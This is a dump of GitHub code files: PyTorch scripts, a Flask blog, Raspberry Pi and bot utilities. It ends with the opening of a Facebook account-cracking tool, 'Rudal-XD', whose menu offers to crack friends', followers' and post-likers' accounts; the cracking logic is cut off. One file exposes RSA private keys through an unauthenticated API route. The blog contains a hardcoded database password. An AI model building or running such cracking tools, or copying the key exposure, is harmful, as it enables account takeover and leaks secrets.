'totalActivos':self.totalActivos\n } \n ","repo_name":"sergiopintah/Python-api-Twitter","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5140567400","text":"\nimport numpy as np\nimport torch\n\nfrom train_by_transformer import my_transformer\nfrom PIL import Image\nfrom torch import nn\nfrom torchvision import transforms\ndevice='cuda'\nd_input = 256\nheads = 8\ndropout = 0.1\n\nmodel =my_transformer(lenth=32)\n\nimage_path='E:/1.SCSF\\Self_supervision\\data/val\\_0/30.jpg'\nimg=Image.open(image_path).convert('1')\nlabel=Image.open('E:/1.SCSF\\Self_supervision\\data/val\\_3/30_3.jpg').convert('1')\n\nmodel.load_state_dict(torch.load( \"save_weights/best_my_model_TF_self.pth\"))\n\nmodel.to(device)\n\nto_tensor = transforms.ToTensor() # 必须进行实例化\n\nimg = to_tensor(img)\nimg = img.view(128, 128)\nimg=img.unsqueeze(0).to(device)\n\nlabel=to_tensor(label).to(device)\nlabel=label.view(32,128)\nlabel=label.unsqueeze(0).to(device)\n\n#创建掩码矩阵,模拟预测过程\nmatrix = np.ones((32, 32))\nT_matrix = torch.from_numpy(matrix)\nmask1 = torch.triu(T_matrix, 0).to(device)\nmask1=torch.t(mask1)\n\npredict=model(img,label,tgt_mask=mask1)\n\n\n#将概率值转成像素值:\nfor i in range(32):\n for j in range(128):\n\n if predict[0][i][j]>0.1:\n predict[0][i][j]=1\n else:\n 
predict[0][i][j]=0\nprint(predict)\n\n#将标签图和预测图显示,观察结果差距\nunloader = transforms.ToPILImage()#tensor转PIL\nimage = unloader(predict)\ntensor_image=to_tensor(image).to(device)\nimage.show()\nima2=unloader(label)\nima2.show()\n\n#输出loss值\nloss1=nn.L1Loss()\nloss=loss1(predict,label)\nprint(loss)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wuyulongstudy/my_self-supervised_transformer-","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24164583645","text":"import mysql.connector\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nfrom flask import Flask\nimport server\napp= Flask(__name__)\n\n\ndb = mysql.connector.connect(\n    host=\"localhost\",\n    user=\"root\",\n    password=\"rootpass\",\n    database=\"data\"\n    )\n#generate Keys for client\nkeyPair = RSA.generate(3072)\npubKey = keyPair.publickey()\npubKeyPEM = pubKey.exportKey()\nprivKeyPEM = keyPair.exportKey()\n\n\nmycursor = db.cursor()\nmycursor.execute(\"INSERT INTO clientKeys (clientPubKeyPEM,clientPrivKeyPEM) VALUES (%s,%s)\",(pubKeyPEM, privKeyPEM))\ndb.commit()\n\nserver.generateServerKeys()#call function to generate keys for server\nmycursor.execute(\"SELECT serverPubKeyPEM FROM serverKeys\")\nfor i in mycursor:\n    serverPubKey = i\n    a = \"\".join(serverPubKey)\nimportedServerPubKey = RSA.importKey(a)#convert to RSA key\n\nmycursor.execute(\"SELECT clientPubKeyPEM FROM clientKeys\")\nfor i in mycursor:\n    clientPubKey = i\n    cPubKey = \"\".join(clientPubKey)\nimportedClientPubKey = RSA.importKey(cPubKey)#convert to RSA key\nmycursor.execute(\"SELECT clientPrivKeyPEM FROM clientKeys\")\nfor i in mycursor:\n    clientPvtKey = i\n    clientPvtKey = \"\".join(clientPvtKey)\nencode_message = str(importedClientPubKey)\nencryptor = PKCS1_OAEP.new(importedServerPubKey) #encryptor\nencrypted = encryptor.encrypt(encode_message.encode())\nencryptor1 = str(encryptor)\nprint(\"Encrypted:\", encrypted)\n\n\nmycursor = db.cursor()\nmycursor.execute(\"INSERT INTO encriptedKeys (encriptedKey,keyNum) VALUES (%s,%s)\", (encrypted, encryptor1))\ndb.commit()\n\nmycursor = db.cursor()\nmycursor.execute(\"SELECT serverPrivKeyPEM FROM serverKeys\")\nfor i in mycursor:\n    serverPvtKey = i\n    serverPvtKey = str(\"\".join(serverPvtKey))\nmycursor = db.cursor()\nmycursor.execute(\"SELECT encriptedKey FROM encriptedKeys\")\nfor i in mycursor:\n    encryptedClientsPubKey = i\nimportedServerPvtKey = RSA.importKey(serverPvtKey) #convert to RSA key\n\ndecryptor1 = PKCS1_OAEP.new(importedServerPvtKey)\ndecrypted = decryptor1.decrypt((encryptedClientsPubKey[0]))\nserver.secondEncription(decrypted)\n\nfinalPubKeyPEM , finalPrivKeyPEM = server.generateSecondKey()##call function to generate second key set\n\n#api route\n@app.route(\"/endTOEndEncryption\")\ndef endTOEndEncryption():\n    return {\"endTOEndEncryption\":[\"client public key:\",str(clientPubKey),\"client private key:\",str(clientPvtKey),\"server public key:\",str(serverPubKey),\"server private key:\",str(serverPvtKey),\"second public key for client :\",str(finalPubKeyPEM),\"second private key for client :\",str(finalPrivKeyPEM)]}\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"UdaraSandaruwan/RSAEncryptionDecription","sub_path":"ClientNew.py","file_name":"ClientNew.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"13532549783","text":"from flask import Flask, render_template, redirect, url_for, flash, request, abort\nfrom flask_bootstrap import Bootstrap5\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm, RegisterForm, LoginForm, CommentForm\nfrom flask_gravatar import Gravatar\nfrom functools import wraps\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship, declarative_base\nfrom flask_migrate import Migrate\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\n# Base = declarative_base()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\nckeditor = CKEditor(app)\nBootstrap5(app)\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"DATABASE_URL\")\n# , default=\"sqlite:///blog.db\"\n# postgresql://blog_data_rxkz_user:cOwXti1ydNSaLI0TEnO0bMIccDYnHlKT@dpg-ci71bsp8g3n3vm4o95r0-a.oregon-postgres.render.com/blog_data_rxkz\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy()\ndb.init_app(app)\nsession = db.session\n\n# CONFIGURE APP FOR FLASK_LOGIN\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n# MIGRATE OBJECT\nmigrate = Migrate(app, db)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return session.get(entity=Users, ident=int(user_id))\n\n\n##CONFIGURE TABLES\n\n\n# ADMIN_DECORATOR\ndef admin_only(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n # If user is not actually logged in\n if current_user.is_anonymous:\n print(\"User is anonymous\")\n return abort(403, description=\"User is anonymous\")\n # If id is not 1 then return abort with 403 error\n elif current_user.id != 1:\n print(\"User is not an admin\")\n return abort(403, description=\"User is not an admin\")\n else:\n print(\"User is an admin\")\n # Otherwise, continue with the route function\n return f(*args, **kwargs)\n\n return decorated_function\n\n\n# MODELS\nclass Users(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(150), unique=True, nullable=False)\n password = db.Column(db.String(150), unique=False, nullable=False)\n name = db.Column(db.String(150), unique=False, nullable=False)\n posts = db.relationship('BlogPost', backref='user')\n comment = db.relationship('Comment', backref='user')\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n author = db.Column(db.String(250), nullable=False)\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text(10485760), nullable=False)\n img_url = db.Column(db.Text(108600), nullable=False)\n user_id = db.Column(db.Integer, ForeignKey('users.id'))\n comment = db.relationship('Comment', backref='blog_posts')\n\n\n# db.create_all()\n\nclass Comment(db.Model):\n __tablename__ = \"comments\"\n id = db.Column(db.Integer, primary_key=True)\n text = db.Column(db.String(300))\n user_id = db.Column(db.Integer, ForeignKey('users.id'))\n blog_id = db.Column(db.Integer, ForeignKey('blog_posts.id'))\n\n\n# GRAVATAR SETUP\ngravatar = Gravatar(app,\n size=100,\n 
rating='g',\n default='retro',\n force_default=False,\n force_lower=False,\n use_ssl=False,\n base_url=None)\n\nwith app.app_context():\n # db.create_all()\n @app.route('/')\n def get_all_posts():\n posts = BlogPost.query.all()\n return render_template(\"index.html\", all_posts=posts, user=current_user)\n\n\n # REGISTER ROUTE\n @app.route('/register', methods=[\"GET\", \"POST\"])\n def register():\n form = RegisterForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(email=request.form.get('email')).first()\n if user:\n flash(message='You\\'ve already signed up with that email. Login instead', category='error')\n return redirect(url_for('login'))\n else:\n new_user = Users(\n email=form.email.data,\n password=generate_password_hash(password=form.password.data),\n name=form.name.data\n )\n db.session.add(new_user)\n db.session.commit()\n login_user(new_user)\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"register.html\", form=form, user=current_user)\n\n\n # LOGIN ROUTE\n @app.route('/login', methods=[\"GET\", \"POST\"])\n def login():\n form = LoginForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(email=request.form.get('email')).first()\n if user:\n if check_password_hash(pwhash=user.password, password=request.form.get('password')):\n login_user(user)\n return redirect(url_for('get_all_posts', user=current_user))\n else:\n flash(message='Password is incorrect', category='error')\n else:\n flash(message='Email does\\'nt exist. You can signup for a new account', category='error')\n return render_template(\"login.html\", form=form, user=current_user)\n\n\n # LOGOUT ROUTE\n @app.route('/logout')\n @login_required\n def logout():\n logout_user()\n return redirect(url_for('get_all_posts'))\n\n\n @app.route(\"/post/\", methods=[\"GET\", \"POST\"])\n # @login_required\n def show_post(post_id):\n comment_form = CommentForm()\n requested_post = session.get(BlogPost, post_id)\n if comment_form.validate_on_submit():\n if not current_user.is_authenticated:\n flash('Please login or register to comment')\n return redirect(url_for('login'))\n else:\n new_comment = Comment(\n text=comment_form.comment.data,\n user=current_user,\n blog_posts=requested_post\n )\n db.session.add(new_comment)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"post.html\", post=requested_post, user=current_user, form=comment_form)\n\n\n @app.route(\"/about\")\n def about():\n return render_template(\"about.html\", user=current_user)\n\n\n @app.route(\"/contact\")\n def contact():\n return render_template(\"contact.html\", user=current_user)\n\n\n @app.route(\"/new-post\", methods=[\"GET\", \"POST\"])\n @login_required\n # @admin_only\n def add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n img_url=form.img_url.data,\n author=current_user.name,\n date=date.today().strftime(\"%B %d, %Y\")\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form, user=current_user)\n\n\n # EDIT POSTS\n @app.route(\"/edit-post/\", methods=[\"GET\", \"POST\"])\n @login_required\n @admin_only\n def edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n author=post.author,\n body=post.body\n )\n if 
edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n # post.author = edit_form.author.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form, user=current_user)\n\n\n # DELETE POSTS\n @app.route(\"/delete/\")\n @login_required\n def delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\n if __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Godwin987/My-Blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20978902876","text":"from __future__ import print_function, absolute_import\n\n__all__ = ['accuracy']\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res","repo_name":"LiyuanLucasLiu/RAdam","sub_path":"cifar_imagenet/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2503,"dataset":"github-code","pt":"66"} +{"seq_id":"5140564710","text":"import os\n\nimport torch\nfrom PIL import Image\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\n\nclass My_dataset(Dataset):\n def __init__(self,path_image,path_lable_1,path_lable_2,path_lable_3,path_lable_4):\n self.path_image=path_image\n self.path_lable_1=path_lable_1\n self.path_lable_2 = path_lable_2\n self.path_lable_3 = path_lable_3\n self.path_lable_4 = path_lable_4\n self.images=os.listdir(self.path_image)\n\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n\n image_index=self.images[index]\n image_path=os.path.join(self.path_image,image_index) #得到图像路径\n img=Image.open(image_path).convert('1') #读取图像\n #1,2,3,4分别代表上右下左\n #1\n label_path=os.path.join(self.path_lable_1,image_index[:-4]+self.path_lable_1[-2:]+'.jpg')\n label_1=Image.open(label_path).convert('1')\n # 2\n label_path = os.path.join(self.path_lable_2, image_index[:-4] + self.path_lable_2[-2:] + '.jpg')\n label_2 = Image.open(label_path).convert('1')\n # 3\n label_path = os.path.join(self.path_lable_3, image_index[:-4] + self.path_lable_3[-2:] + '.jpg')\n label_3 = Image.open(label_path).convert('1')\n # 4\n label_path = os.path.join(self.path_lable_4, image_index[:-4] + self.path_lable_4[-2:] + '.jpg')\n label_4 = Image.open(label_path).convert('1')\n\n #把图像转成tensor格式\n to_tensor = transforms.ToTensor() # 必须进行实例化\n img = to_tensor(img)\n img = img.view(128, 128)\n\n label_1=to_tensor(label_1)\n label_1=label_1.view(32,128)\n\n label_2 = to_tensor(label_2)\n label_2 = label_2.view(128, 32)\n\n label_3 = to_tensor(label_3)\n label_3 = label_3.view(32, 128)\n\n label_4= to_tensor(label_4)\n label_4 = label_4.view(128, 32)\n\n #生成上方的,从下往上生成\n img_1=torch.flip(img,[0])\n label_1=torch.flip(label_1,[0])\n\n # 生成右方的,从左往右生成\n\n img_2 = torch.t(img)\n label_2 = 
torch.t(label_2)\n\n # 生成下方的,从上往下生成\n img_3 =img\n label_3 = label_3\n\n # 生成右方的,从右往左生成\n img_4 = torch.t(img)\n label_4 = torch.t(label_4)\n img_4 = torch.flip(img_4, [0])\n label_4 = torch.flip(label_4, [0])\n\n return img_1,label_1,img_2,label_2,img_3,label_3,img_4,label_4\n\n\n\n","repo_name":"wuyulongstudy/my_self-supervised_transformer-","sub_path":"my_dataset.py","file_name":"my_dataset.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6554116815","text":"import RPi.GPIO as GPIO\nimport time\nfrom math import ceil\n\ndef dec2bin(x):\n return [int(bit) for bit in bin(x)[2:].zfill(8)]\n\ndef adc():\n x = 0\n\n for i in range(7, -1, -1):\n x += 2**i\n GPIO.output(dac, dec2bin(x))\n time.sleep(0.001)\n comp_value = GPIO.input(comp)\n if comp_value == 0:\n x -= 2**i\n\n return x\n\nGPIO.setmode(GPIO.BCM)\n\ndac = [26, 19, 13, 6, 5, 11, 9, 10]\nleds = [21, 20, 16, 12, 7, 8, 25, 24]\ncomp = 4\ntroyka = 17\n\nGPIO.setup(dac, GPIO.OUT)\nGPIO.setup(troyka, GPIO.OUT, initial = GPIO.LOW)\nGPIO.setup(comp, GPIO.IN)\nGPIO.setup(leds, GPIO.OUT)\n\ntry:\n while True:\n x = ceil(adc()/32)\n signal = [0, 0, 0, 0, 0, 0, 0, 0]\n for i in range(x):\n signal[7-i] = 1\n GPIO.output(leds, signal)\n\nexcept KeyboardInterrupt:\n print(\"The program has been stopped by pressing on a key\")\n\nfinally:\n GPIO.output(dac, 0)\n GPIO.output(troyka, 0)\n GPIO.cleanup()","repo_name":"IvanLikhodievskiy/get","sub_path":"5-3-adc-volume.py","file_name":"5-3-adc-volume.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40070042693","text":"import time\nfrom copy import copy\n\nfrom nonebot import get_bot\nfrom nonebot.log import logger\nimport platform\nimport httpx\nimport json\n\nbot = get_bot()\nconfig = bot.config\n\n\nclass Request:\n def __init__(self):\n self.headers = {\"User-Agent\": f\"NoneBot({list(config.SUPERUSERS)[0]}/{platform.python_version()})\"}\n\n async def connect(self, url: str, data: dict = None, headers: dict = None, timeout: int = 10) -> str:\n headers = headers if headers else self.headers\n try:\n async with httpx.AsyncClient() as client:\n result = await client.post(url=url, data=data, headers=headers, timeout=timeout)\n return await self.result(result.text)\n except Exception as e:\n logger.error(f\"连接网页 {url} 出问题惹!{e}\")\n\n async def content(self, url: str, params: dict = None, headers: dict = None, timeout: int = 10) -> str:\n headers = headers if headers else self.headers\n try:\n async with httpx.AsyncClient() as client:\n result = await client.get(url=url, params=params, headers=headers, timeout=timeout)\n return await self.result(result.text)\n except Exception as e:\n logger.error(f\"连接网页 {url} 出问题惹!{e}\")\n\n async def result(self, data: str) -> str:\n try:\n result = json.loads(data)\n except (json.decoder.JSONDecodeError, TypeError):\n return data\n return result\n","repo_name":"nicemoe/jx3bot","sub_path":"plugin/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"17883057125","text":"import re\nfrom io import BytesIO\n\nfrom flake8.formatting import base\n\nfrom teamcity.messages import TeamcityServiceMessages\nfrom teamcity import __version__, is_running_under_teamcity\n\n\nclass TeamcityReport(base.BaseFormatter):\n name = 
'teamcity-messages'\n version = __version__\n\n @staticmethod\n def _add_option(parser, name, *args, **kwargs):\n if all(option.long_option_name != name for option in parser.options):\n parser.add_option(name, *args, **kwargs)\n\n @classmethod\n def add_options(cls, parser):\n cls._add_option(parser,\n '--teamcity',\n default=is_running_under_teamcity(),\n help=\"Force output of JetBrains TeamCity service messages\")\n cls._add_option(parser,\n '--no-teamcity',\n default=False,\n help=\"Disable output of JetBrains TeamCity service messages (even under TeamCity build)\")\n\n @classmethod\n def parse_options(cls, options):\n if not options.no_teamcity:\n if options.teamcity or is_running_under_teamcity():\n options.format = 'teamcity-messages'\n\n def format(self, error):\n normalized_filename = error.filename.replace(\"\\\\\", \"/\")\n position = '%s:%d:%d' % (\n normalized_filename, error.line_number, error.column_number)\n error_message = '%s %s' % (error.code, error.text)\n test_name = 'pep8: %s: %s' % (normalized_filename, error_message)\n\n line = error.physical_line\n offset = error.column_number\n details = [\n position,\n line.rstrip(),\n re.sub(r'\\S', ' ', line[:offset]) + '^',\n ]\n details = '\\n'.join(details)\n\n bytesio = BytesIO()\n messages = TeamcityServiceMessages(output=bytesio)\n\n messages.testStarted(test_name)\n messages.testFailed(test_name, error_message, details)\n messages.testFinished(test_name)\n\n return bytesio.getvalue().decode('UTF-8')\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/pycharm/teamcity/flake8_v3_plugin.py","file_name":"flake8_v3_plugin.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"43009741874","text":"'''\n author: Sungguk Cha\n email : navinad@naver.com\n\n evaluation script with label and prediction(image form)\n'''\n\nimport argparse\nimport numpy as np\nimport os\n\nfrom PIL import Image\nfrom torch.utils import data\nfrom tqdm import tqdm\nfrom utils.metrics import Evaluator\n\nclass Loader(data.Dataset):\n def __init__(self, args):\n self.args = args\n\n # labels\n self.label_dir = args.labels\n '''\n for img in os.listdir(args.labels):\n _dir = os.path.join(args.labels, img)\n if os.path.isfile(_dir):\n self.labels.append(_dir)\n '''\n\n # predictions\n self.preds = []\n for img in os.listdir(args.preds):\n _dir = os.path.join(args.preds, img)\n if os.path.isfile(_dir):\n self.preds.append(_dir)\n\n #assert len(self.labels) == len(self.preds)\n\n def __len__(self):\n return len(self.preds)\n\n def __getitem__(self, index):\n _pred = self.preds[index]\n _name = os.path.basename(_pred.split('.')[-2] + '.png')\n _label = os.path.join(self.label_dir, _name)\n assert os.path.basename(_pred.split('.')[-2]) == os.path.basename(_label.split('.')[-2])\n _label = Image.open(_label).convert('RGB')\n _pred = Image.open(_pred).convert('RGB')\n if _label.size != _pred.size:\n _pred = _pred.resize( _label.size, Image.BILINEAR )\n _label = np.asarray(_label)\n _pred = np.asarray(_pred)\n\n return {'pred':_pred, 'label':_label, 'name':_name}\n\nclass Eval(object):\n def __init__(self, args):\n self.args = args\n self.evaluator = Evaluator(args.nclass)\n self.loader = Loader(args)\n\n def evaluation(self):\n self.evaluator.reset()\n tbar = tqdm(self.loader)\n for i, sample in enumerate(tbar):\n names = sample['name']\n preds = sample['pred']\n labels = sample['label']\n self.evaluator.add_batch(labels, preds)\n \n 
miou = self.evaluator.Mean_Intersection_over_Union()\n        fwiou = self.evaluator.Frequency_Weighted_Intersection_over_Union()\n        print(\"mIoU:\", miou)\n        print(\"fwIoU:\", fwiou)\n\ndef get_args():\n    parser = argparse.ArgumentParser()\n    # Dataset specific\n    parser.add_argument('--nclass', type=int)\n    # Dataloader specific\n    parser.add_argument('--preds', type=str)\n    parser.add_argument('--labels', type=str)\n    parser.add_argument('--vis', default=False, action='store_true')\n    return parser.parse_args()\n\nif __name__ == '__main__':\n    args = get_args()\n    ev = Eval(args)\n    ev.evaluation()\n","repo_name":"sunggukcha/deeplabs","sub_path":"evalbyimage.py","file_name":"evalbyimage.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"66"} +{"seq_id":"4986774720","text":"n = int(input())\r\n\r\nfor i in range(1,n+1):\r\n    a = sum((map(int,str(i))))\r\n    a_sum = i + a\r\n\r\n    if a_sum == n:\r\n        print(i)\r\n        break\r\n    if i == n:\r\n        print(0)","repo_name":"hungeun/Algorithm_hg","sub_path":"hungeun/브루트 포스/브루트 포스/분해합.py","file_name":"분해합.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"429438593","text":"import requests,bs4,json,os,sys,random,datetime,time,re\n\nimport threading\n\nfrom rich.table import Table as me\n\nfrom rich.console import Console as sol\n\nfrom bs4 import BeautifulSoup as parser\n\nfrom concurrent.futures import ThreadPoolExecutor as tred\n\nfrom rich.console import Group as gp\n\nfrom rich.panel import Panel as nel\n\nfrom rich import print as cetak\n\nfrom rich.markdown import Markdown as mark\n\nfrom rich.columns import Columns as col\n\n\nid,id2,loop,ok,cp,akun,oprek,method,lisensiku,taplikasi,tokenku,uid,lisensikuni= [],[],0,0,0,[],[],[],[],[],[],[],[]\n\n\n\nx = '\\33[m' # DEFAULT\n\nk = '\\033[93m' # KUNING +\n\nh = '\\x1b[1;92m' # HIJAU +\n\nhh = '\\033[32m' # HIJAU -\n\nu = '\\033[95m' # UNGU\n\nkk = '\\033[33m' # KUNING -\n\nb = '\\33[1;96m' # BIRU -\n\np = '\\x1b[0;34m' # BIRU +\n\nP = '\\033[0;00m'\n\nJ = '\\033[0;33m'\n\nS = '\\033[0;00m'\n\nN = '\\x1b[0m'\n\nI ='\\033[0;32m'\n\nC ='\\033[0;36m'\n\nM ='\\033[0;31m'\n\nU ='\\033[0;35m'\n\nK ='\\033[0;33m'\n\nP='\\033[00m'\n\nh='\\033[0;90m'\n\nQ=\"\\033[00m\"\n\nkk='\\033[0;32m'\n\nff='\\033[0;36m'\n\nG='\\033[0;36m'\n\np='\\033[00m'\n\nh='\\033[0;90m'\n\nQ=\"\\033[00m\"\n\nI='\\033[0;32m'\n\nII='\\033[0;36m'\n\nm='\\033[0;31m'\n\nO ='\\033[0;33m'\n\nH='\\033[0;33m'\n\nb = '\\033[0;36m'\n\nwar = \"[•]\"\n\nB = random.choice([U,I,K,b,M])\n\n\n\ndic = {'1':'Januari','2':'Februari','3':'Maret','4':'April','5':'Mei','6':'Juni','7':'Juli','8':'Agustus','9':'September','10':'Oktober','11':'November','12':'Desember'}\n\ndic2 = {'01':'Januari','02':'Februari','03':'Maret','04':'April','05':'Mei','06':'Juni','07':'Juli','08':'Agustus','09':'September','10':'Oktober','11':'November','12':'Desember'}\n\ntgl = datetime.datetime.now().day\n\nbln = dic[(str(datetime.datetime.now().month))]\n\nthn = datetime.datetime.now().year\n\nokc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'\n\ncpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'\n\ndef clear():\n\tos.system('clear')\ndef back():\n\tmenu()\ndef banner():\n\tprint('''%s\n\t_______ ______ _______ _ ______ \n ( ____ )|\\ /|( __ \\ ( ___ )( \\ |\\ /|( __ \\ \n | ( )|| ) ( || ( \\ )| ( ) || ( ( \\ / )| ( \\ )\n | (____)|| | | || | ) || (___) || | _____ \\ (_) / | | ) |\n | __)| | | || 
| | || ___ || |(_____) ) _ ( | | | |\n | (\\ ( | | | || | ) || ( ) || | / ( ) \\ | | ) |\n | ) \\ \\__| (___) || (__/ )| ) ( || (____/\\( / \\ )| (__/ )\n |/ \\__/(_______)(______/ |/ \\|(_______/|/ \\|(______/ \n \n───────────────────────────────────────────────────────\n [\\x1b[1;96m+%s] Author : Rudal-XD\n [\\x1b[1;96m+%s] Github : -\n [\\x1b[1;96m+%s] Facebook : Fanky\n───────────────────────────────────────────────────────\\n'''%(N,N,N,N))\n\n\nbalmond = O+\"[\"+J+\"•\"+O+\"]\"\n\n\ndef login():\n\t\tbanner()\n\t\tsky = '# MASUKAN TOKEN FACEBOOK'\n\t\tsky2 = mark(sky, style='green')\n\t\tsol().print(sky2, style='cyan')\n\t\tpanda = input(x+'['+p+'•'+x+'] Token Fb : ')\n\t\takun=open('.token.x','w').write(panda)\n\t\ttry:\n\t\t\ttes = requests.get('https://graph.facebook.com/me?access_token='+panda)\n\t\t\ttes3 = json.loads(tes.text)['id']\n\t\t\tsue = '# nice Login berhasil'\n\t\t\tsuu = mark(sue, style='green')\n\t\t\tsol().print(suu, style='cyan')\n\t\t\ttime.sleep(2)\n\t\t\tmenu()\n\t\texcept KeyError:\n\t\t\tsue = '# Login Gagal, Cek token'\n\t\t\tsuu = mark(sue, style='red')\n\t\t\tsol().print(suu, style='cyan')\n\t\t\ttime.sleep(2)\n\t\t\tlogin()\n\t\texcept requests.exception.ConnectionError:\n\t\t\tli = '# KONEKSI INTERNET \t\t\t\t\t\t\t\t\tBERMASALAH, PERIKSA & COBA LAGI'\n\t\t\tlo = mark(li, style='red')\n\t\t\tsol().print(lo, style='cyan')\n\t\t\tmenu()\n\t\t\nclass menu:\n\n\tdef __init__(self): #line1\n\t\tself.uid = []\n\tdef menu(self):\n\t\ttry:\n\t\t\ttoke = open('token.x','r').read()\n\t\texcept IOError:\n\t\t\tprint(' [%s+%s] Kamu belum login'%(M,N));login().__login__()\n\t\ttry:\n\t\t\tr = requests.get('https://graph.facebook.com/me?access_token=%s'%(toke)).json()['name']\n\t\texcept KeyError:\n\t\t\tprint(' [%s!%s] Login gagal ...'%(M,N));os.system('rm -rf token.x');time.sleep(2);login().__login__()\n\t\texcept requests.exceptions.ConnectionError:\n\t\t\texit(' [%s!%s] cek koneksi'%(M,N))\n\t\ttry:\n\t\t\takss = open('token.x','r').read()\n\t\texcept IOError:\n\t\t\takss = '-'\n\t\tbanner()\n\t\tIP = requests.get('https://api.ipify.org').text\n\t\tjalan(' %s[ %sselamat Datang %s%s ]'%(N,H,r,N))\n\t\tprint(' %s[%s•%s] Alamat IP kamu saat ini : %s'%(H,O,H,IP))\n\t\tprint(' %s[%s•%s] Kamu masuk pada : %s'%(N,O,N,waktu))\n\t\tprint(' %s'%(N))\n\t\tprint(' %s[%s0%s] crack dari daftar teman'%(N,O,N))\n\t\tprint(' %s[%s1%s] crack dari akun publik'%(N,O,N))\n\t\tprint(' %s[%s2%s] crack dari akun massal'%(N,O,N))\n\t\tprint(' %s[%s3%s] crack dari postingan'%(N,O,N))\n\t\tprint(' %s[%s4%s] crack dari likes post'%(N,O,N))\n\t\tprint(' %s[%s5%s] crack dari followers'%(N,O,N))\n\t\tprint(' %s[%s6%s] cek opsi akun chekpoint'%(N,O,N))\n\t\tprint(' %s[%s7%s] cek hasil crack ok,cp'%(N,O,N))\n\t\tprint(' %s[%s8%s] seting User-Agent'%(N,O,N))\n\t\tprint(' %s[%s9%s] crack email'%(N,O,N))\n\t\tprint(' %s[%sG%s] Get data² facebook'%(N,O,N))\n\t\tprint(' %s[%sK%s] Lapor bug 